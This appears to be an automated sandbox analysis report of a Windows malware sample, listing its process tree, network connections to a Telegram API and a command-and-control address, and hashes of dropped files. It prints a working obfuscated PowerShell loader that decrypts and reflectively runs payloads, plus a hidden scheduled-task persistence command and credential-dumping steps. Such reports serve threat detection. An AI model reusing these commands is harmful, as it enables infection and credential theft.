"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wild2.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\dropped.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('ugGNW2NnPvk9adSUBcDc96/inp4cdhLsP4c8Xr7rMvA='); $aes_var.IV=[System.Convert]::FromBase64String('GuK3QAh6wjXaE/OXIlyZUw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ikyRS=New-Object System.IO.MemoryStream(,$param_var); $tIvxd=New-Object System.IO.MemoryStream; $uIXwv=New-Object System.IO.Compression.GZipStream($ikyRS, [IO.Compression.CompressionMode]::Decompress); $uIXwv.CopyTo($tIvxd); $uIXwv.Dispose(); $ikyRS.Dispose(); $tIvxd.Dispose(); $tIvxd.ToArray();}function execute_function($param_var,$param2_var){ $kiXtP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $zdYbv=$kiXtP.EntryPoint; $zdYbv.Invoke($null, $param2_var);}$dTbxL = 'C:\Users\Admin\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $dTbxL;$cGnsR=[System.IO.File]::ReadAllText($dTbxL).Split([Environment]::NewLine);foreach ($QrlnJ in $cGnsR) { if ($QrlnJ.StartsWith('oJuhxRvpkzgxXdlXhMuO')) { $JHuZc=$QrlnJ.Substring(20); break; }}$payloads_var=[string[]]$JHuZc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\dropped')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Cd %temp% && All-In-One.exe OutPut.json
C:\Users\Admin\AppData\Local\Temp\All-In-One.exe
All-In-One.exe OutPut.json
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 142.202.242.177 7000 <123456789> E7454CC4D6D92D307990
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 142.202.242.177:7000 | tcp | |
| US | 8.8.8.8:53 | 177.242.202.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 142.202.242.177:7000 | tcp | |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\dropped.bat
| MD5 | e770f53921bca6b9d02faf3e70059249 |
| SHA1 | fb04530ec135f2a34afd3bdf0c205193418812b6 |
| SHA256 | be7e5d1cccf5602cbe866ce6f342bd960263f3cd08a75d149372af37fa2a50b1 |
| SHA512 | f970fab83358451a7cb158d4377defa35188996b1f2005a90e1fe0e747db65424366efcc847c133919395310536348bc795caef3161a21b70b2b0cd16566ec86 |
memory/4612-2-0x00007FFFDF373000-0x00007FFFDF375000-memory.dmp
memory/4612-12-0x0000020FF3050000-0x0000020FF3072000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jo2u1dha.lar.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4612-13-0x00007FFFDF370000-0x00007FFFDFE31000-memory.dmp
memory/4612-14-0x00007FFFDF370000-0x00007FFFDFE31000-memory.dmp
memory/4612-15-0x0000020FF3460000-0x0000020FF34A4000-memory.dmp
memory/4612-16-0x0000020FF3530000-0x0000020FF35A6000-memory.dmp
memory/4612-28-0x0000020FF30A0000-0x0000020FF30A8000-memory.dmp
memory/4612-29-0x0000020FF30B0000-0x0000020FF30C0000-memory.dmp
memory/4612-30-0x00007FFFFD890000-0x00007FFFFDA85000-memory.dmp
memory/4612-32-0x0000020FF3410000-0x0000020FF3424000-memory.dmp
memory/4612-31-0x00007FFFFD1F0000-0x00007FFFFD2AE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3f01549ee3e4c18244797530b588dad9 |
| SHA1 | 3e87863fc06995fe4b741357c68931221d6cc0b9 |
| SHA256 | 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a |
| SHA512 | 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 97748f71ed95026706014e8524266292 |
| SHA1 | f60663ea2e2a778c57d07d9678fe04c79c3ff942 |
| SHA256 | f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f |
| SHA512 | b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9 |
memory/4612-56-0x0000020FF3920000-0x0000020FF3936000-memory.dmp
memory/4612-58-0x00007FFFDF373000-0x00007FFFDF375000-memory.dmp
memory/4612-59-0x00007FFFDF370000-0x00007FFFDFE31000-memory.dmp
memory/4612-60-0x0000020FF4570000-0x0000020FF468E000-memory.dmp
memory/4612-99-0x0000020FF4EF0000-0x0000020FF53C4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\External\Components\nss3.dll
| MD5 | 7ddbd64d87c94fd0b5914688093dd5c2 |
| SHA1 | d49d1f79efae8a5f58e6f713e43360117589efeb |
| SHA256 | 769703fb1ba6c95fb6c889e8a9baaea309e62d0f3ca444d01cc6b495c0f722d1 |
| SHA512 | 60eaad58c3c4894f1673723eb28ddb42b681ff7aafe7a29ff8bf87a2da6595c16d1f8449096accdb89bd6cda6454eb90470e71dde7c5bd16abd0f80e115cfa2d |
C:\Users\Admin\AppData\Local\Temp\External\Components\nspr4.dll
| MD5 | 72414dfb0b112c664d2c8d1215674e09 |
| SHA1 | 50a1e61309741e92fe3931d8eb606f8ada582c0a |
| SHA256 | 69e73fea2210adc2ae0837ac98b46980a09fe91c07f181a28fda195e2b9e6b71 |
| SHA512 | 41428624573b4a191b33657ed9ad760b500c5640f3d62b758869a17857edc68f90bc10d7a5e720029519c0d49b5ca0fa8579743e80b200ef331e41efde1dc8c9 |
C:\Users\Admin\AppData\Local\Temp\External\Components\plc4.dll
| MD5 | c73ec58b42e66443fafc03f3a84dcef9 |
| SHA1 | 5e91f467fe853da2c437f887162bccc6fd9d9dbe |
| SHA256 | 2dc0171b83c406db6ec9389b438828246b282862d2b8bdf2f5b75aec932a69f7 |
| SHA512 | 6318e831d8f38525e2e49b5a1661440cd8b1f3d2afc6813bb862c21d88d213c4675a8ec2a413b14fbdca896c63b65a7da6ec9595893b352ade8979e7e86a7fcf |
C:\Users\Admin\AppData\Local\Temp\External\Components\plds4.dll
| MD5 | ee44d5d780521816c906568a8798ed2f |
| SHA1 | 2da1b06d5de378cbfc7f2614a0f280f59f2b1224 |
| SHA256 | 50b2735318233d6c87b6efccccc23a0e3216d2870c67f2f193cc1c83c7c879fc |
| SHA512 | 634a1cd2baaef29b4fe7c7583c04406bb2ea3a3c93294b31f621652844541e7c549da1a31619f657207327604c261976e15845571ee1efe5416f1b021d361da8 |
C:\Users\Admin\AppData\Local\Temp\External\Components\softokn3.dll
| MD5 | e846285b19405b11c8f19c1ed0a57292 |
| SHA1 | 2c20cf37394be48770cd6d396878a3ca70066fd0 |
| SHA256 | 251f0094b6b6537df3d3ce7c2663726616f06cfb9b6de90efabd67de2179a477 |
| SHA512 | b622ff07ae2f77e886a93987a9a922e80032e9041ed41503f0e38abb8c344eb922d154ade29e52454d0a1ad31596c4085f4bd942e4412af9f0698183acd75db7 |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-conio-l1-1-0_not.dll
| MD5 | 6ea692f862bdeb446e649e4b2893e36f |
| SHA1 | 84fceae03d28ff1907048acee7eae7e45baaf2bd |
| SHA256 | 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2 |
| SHA512 | 9661c135f50000e0018b3e5c119515cfe977b2f5f88b0f5715e29df10517b196c81694d074398c99a572a971ec843b3676d6a831714ab632645ed25959d5e3e7 |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | 72e28c902cd947f9a3425b19ac5a64bd |
| SHA1 | 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7 |
| SHA256 | 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1 |
| SHA512 | 58ab6fedce2f8ee0970894273886cb20b10d92979b21cda97ae0c41d0676cc0cd90691c58b223bce5f338e0718d1716e6ce59a106901fe9706f85c3acf7855ff |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | ac290dad7cb4ca2d93516580452eda1c |
| SHA1 | fa949453557d0049d723f9615e4f390010520eda |
| SHA256 | c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382 |
| SHA512 | b5e2b9f5a9dd8a482169c7fc05f018ad8fe6ae27cb6540e67679272698bfca24b2ca5a377fa61897f328b3deac10237cafbd73bc965bf9055765923aba9478f8 |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | aec2268601470050e62cb8066dd41a59 |
| SHA1 | 363ed259905442c4e3b89901bfd8a43b96bf25e4 |
| SHA256 | 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2 |
| SHA512 | 0c14d160bfa3ac52c35ff2f2813b85f8212c5f3afbcfe71a60ccc2b9e61e51736f0bf37ca1f9975b28968790ea62ed5924fae4654182f67114bd20d8466c4b8f |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-heap-l1-1-0.dll
| MD5 | 93d3da06bf894f4fa21007bee06b5e7d |
| SHA1 | 1e47230a7ebcfaf643087a1929a385e0d554ad15 |
| SHA256 | f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d |
| SHA512 | 72bd6d46a464de74a8dac4c346c52d068116910587b1c7b97978df888925216958ce77be1ae049c3dccf5bf3fffb21bc41a0ac329622bc9bbc190df63abb25c6 |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | a2f2258c32e3ba9abf9e9e38ef7da8c9 |
| SHA1 | 116846ca871114b7c54148ab2d968f364da6142f |
| SHA256 | 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33 |
| SHA512 | e98cbc8d958e604effa614a3964b3d66b6fc646bdca9aa679ea5e4eb92ec0497b91485a40742f3471f4ff10de83122331699edc56a50f06ae86f21fad70953fe |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-math-l1-1-0.dll
| MD5 | 8b0ba750e7b15300482ce6c961a932f0 |
| SHA1 | 71a2f5d76d23e48cef8f258eaad63e586cfc0e19 |
| SHA256 | bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed |
| SHA512 | fb646cdcdb462a347ed843312418f037f3212b2481f3897a16c22446824149ee96eb4a4b47a903ca27b1f4d7a352605d4930df73092c380e3d4d77ce4e972c5a |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-multibyte-l1-1-0.dll
| MD5 | 35fc66bd813d0f126883e695664e7b83 |
| SHA1 | 2fd63c18cc5dc4defc7ea82f421050e668f68548 |
| SHA256 | 66abf3a1147751c95689f5bc6a259e55281ec3d06d3332dd0ba464effa716735 |
| SHA512 | 65f8397de5c48d3df8ad79baf46c1d3a0761f727e918ae63612ea37d96adf16cc76d70d454a599f37f9ba9b4e2e38ebc845df4c74fc1e1131720fd0dcb881431 |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | 41a348f9bedc8681fb30fa78e45edb24 |
| SHA1 | 66e76c0574a549f293323dd6f863a8a5b54f3f9b |
| SHA256 | c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b |
| SHA512 | 8c2cb53ccf9719de87ee65ed2e1947e266ec7e8343246def6429c6df0dc514079f5171acd1aa637276256c607f1063144494b992d4635b01e09ddea6f5eef204 |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | fefb98394cb9ef4368da798deab00e21 |
| SHA1 | 316d86926b558c9f3f6133739c1a8477b9e60740 |
| SHA256 | b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7 |
| SHA512 | 57476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8 |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-string-l1-1-0.dll
| MD5 | 404604cd100a1e60dfdaf6ecf5ba14c0 |
| SHA1 | 58469835ab4b916927b3cabf54aee4f380ff6748 |
| SHA256 | 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c |
| SHA512 | da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4 |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-time-l1-1-0.dll
| MD5 | 849f2c3ebf1fcba33d16153692d5810f |
| SHA1 | 1f8eda52d31512ebfdd546be60990b95c8e28bfb |
| SHA256 | 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d |
| SHA512 | 44dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5 |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\api-ms-win-crt-utility-l1-1-0.dll
| MD5 | b52a0ca52c9c207874639b62b6082242 |
| SHA1 | 6fb845d6a82102ff74bd35f42a2844d8c450413b |
| SHA256 | a1d1d6b0cb0a8421d7c0d1297c4c389c95514493cd0a386b49dc517ac1b9a2b0 |
| SHA512 | 18834d89376d703bd461edf7738eb723ad8d54cb92acc9b6f10cbb55d63db22c2a0f2f3067fe2cc6feb775db397030606608ff791a46bf048016a1333028d0a4 |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\freebl3.dll
| MD5 | 04a2ba08eb17206b7426cb941f39250b |
| SHA1 | 731ac2b533724d9f540759d84b3e36910278edba |
| SHA256 | 8e5110ce03826f680f30013985be49ebd8fc672de113fc1d9a566eced149b8c4 |
| SHA512 | e6e90b4becf472b2e8f716dbb962cd7de61676fcce342c735fccdc01268b5a221139bc9be0e0c9722e9978aefaae79c10bc49c43392aa05dd12244b3147aeffc |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\mozglue.dll
| MD5 | 591533ca4655646981f759d95f75ae3d |
| SHA1 | b4a02f18e505a1273f7090a9d246bc953a2cb792 |
| SHA256 | 4434f4223d24fb6e2f5840dd6c1eedef2875e11abe24e4b0e9bc1507f8f6fd47 |
| SHA512 | 915b124ad595ee78feab8f3c9be7e80155445e58ed4c88b89665df5fb7e0a04e973374a01f97bb67aaa733a8ce2e91a9f92605ec96251906e0fb2750a719b579 |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\nss3.dll
| MD5 | fc57d044bfd635997415c5f655b5fffa |
| SHA1 | 1b5162443d985648ef64e4aab42089ad4c25f856 |
| SHA256 | 17f8c55eba797bbc80c8c32ca1a3a7588415984386be56f4b4cdefd4176fb4c3 |
| SHA512 | f5a944230000730bc0aad10e6607e3389d9d82a0a4ab1b72a19d32e94e8572789d46fb4acd75ad48f17e2bbc27389d432086696f2ccc899850ff9177d6823efb |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\softokn3.dll
| MD5 | 1b304dad157edc24e397629c0b688a3e |
| SHA1 | ae151af384675125dfbdc96147094cff7179b7da |
| SHA256 | 8f0c9ac7134773d11d402e49daa90958fe00205e83a7389f7a58da03892d20cb |
| SHA512 | 2dc625dbdf2aae4ade600cca688eb5280200e8d7c2dfc359590435afe0926b3a7446cc56a66023ee834366132a68ae68da51a5079e4f107201e2050f5c5512ad |
C:\Users\Admin\AppData\Local\Temp\External\ComponentsExt\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
C:\Users\Admin\AppData\Local\Temp\All-In-One.exe
| MD5 | a48e3197ab0f64c4684f0828f742165c |
| SHA1 | f935c3d6f9601c795f2211e34b3778fad14442b4 |
| SHA256 | baecc747370a4c396ef5403a3a2b286465d8fe4677bf1bfd23b8164ef5c22bbb |
| SHA512 | e0b0b73c39850a30aac89f84f721c79f863612f596d6ff3df0860a9faf743a81364656773c99708e9c0656c74b6a278b6bf7e648f7ff1b9080f9a21e10515a59 |
C:\Users\Admin\AppData\Local\Temp\settings.db
| MD5 | 56b941f65d270f2bf397be196fcf4406 |
| SHA1 | 244f2e964da92f7ef7f809e5ce0b3191aeab084a |
| SHA256 | 00c020ba1cce022364976f164c575993cb3b811c61b5b4e05a8a0c3d1b560c0c |
| SHA512 | 52ad8c7ed497a5b8eed565b3abcbf544841f3c8c9ec3ca8f686846a2afd15ac4ac8b16abf1cb14aeca1a2fb31f3086ad17206ec4af28e77bae600dca15e8deab |
C:\Users\Admin\AppData\Local\Temp\License.XenArmor
| MD5 | 774a9a7b72f7ed97905076523bdfe603 |
| SHA1 | 946355308d2224694e0957f4ebf6cdba58327370 |
| SHA256 | 76e56835b1ac5d7a8409b7333826a2353401cf67f3bd95c733adc6aa8d9fec81 |
| SHA512 | c5c77c6827c72901494b3a368593cb9a990451664b082761294a845c0cd9441d37e5e9ac0e82155cb4d97f29507ffc8e26d6ff74009666c3075578aa18b28675 |
C:\Users\Admin\AppData\Local\Temp\XenManager.dll
| MD5 | 7a5c53a889c4bf3f773f90b85af5449e |
| SHA1 | 25b2928c310b3068b629e9dca38c7f10f6adc5b6 |
| SHA256 | baa9c3a0d0524263c4f848056b3f1da3b4bb913162362cbcabe77ce76a39870c |
| SHA512 | f5943687d7e098790581bf56ac6fec3b7e9b83d0e29301077a8bc48768c5a0e9f54f53d926f9847885f6035a2b31e456e4e45ccf1c70be27229c46e79876e2ed |
memory/4612-244-0x0000020FF4A90000-0x0000020FF4AA6000-memory.dmp
memory/1188-256-0x0000000000550000-0x0000000000560000-memory.dmp
memory/1188-263-0x0000000004DE0000-0x0000000004E72000-memory.dmp
memory/1188-264-0x0000000004E80000-0x0000000004F1C000-memory.dmp
memory/1188-265-0x00000000054D0000-0x0000000005A74000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\OutPut.json
| MD5 | f6ce70d5466fe074a3b419543ff95d8b |
| SHA1 | 915d6dc9ca2686d63979e77adc43d71c9678e534 |
| SHA256 | 6a509971a9cc11490946cb7b33864da43cd3af9f25673c130fc3bab5c365ff29 |
| SHA512 | 93e83de5d0a96cd71dcfb8f9ab3b32ed2afaa388a77ac450dd7fdca11dcf2ff0d59db54107c936859d6df3b6d28630b2e9907e0b546e8b27336b684bcbed84f8 |
memory/1188-294-0x0000000005120000-0x0000000005186000-memory.dmp
memory/3372-295-0x0000000002E70000-0x0000000002EA6000-memory.dmp
memory/3372-296-0x0000000005530000-0x0000000005B58000-memory.dmp
memory/3372-297-0x00000000054B0000-0x00000000054D2000-memory.dmp
memory/3372-298-0x0000000005CD0000-0x0000000005D36000-memory.dmp
memory/3372-308-0x0000000005FA0000-0x00000000062F4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a0cb52ecad11458881d7edfc499c4053 |
| SHA1 | eda74aa1fa1b46fdbf5befc3d9843e98eb06b02b |
| SHA256 | c96df62683d2b79ca4b1a97bcc247de6822a7bd8eb3f7de533caf198509a6f5b |
| SHA512 | 8a9c2126701b9324e5bb770b13673ba412445dc095a2c016234198d95111c28b96d2bef0172b43c34215824922d4ed5aa8707f8dc6f0535c1be5b0f506063467 |
memory/3372-310-0x0000000006450000-0x000000000646E000-memory.dmp
memory/3372-311-0x0000000006490000-0x00000000064DC000-memory.dmp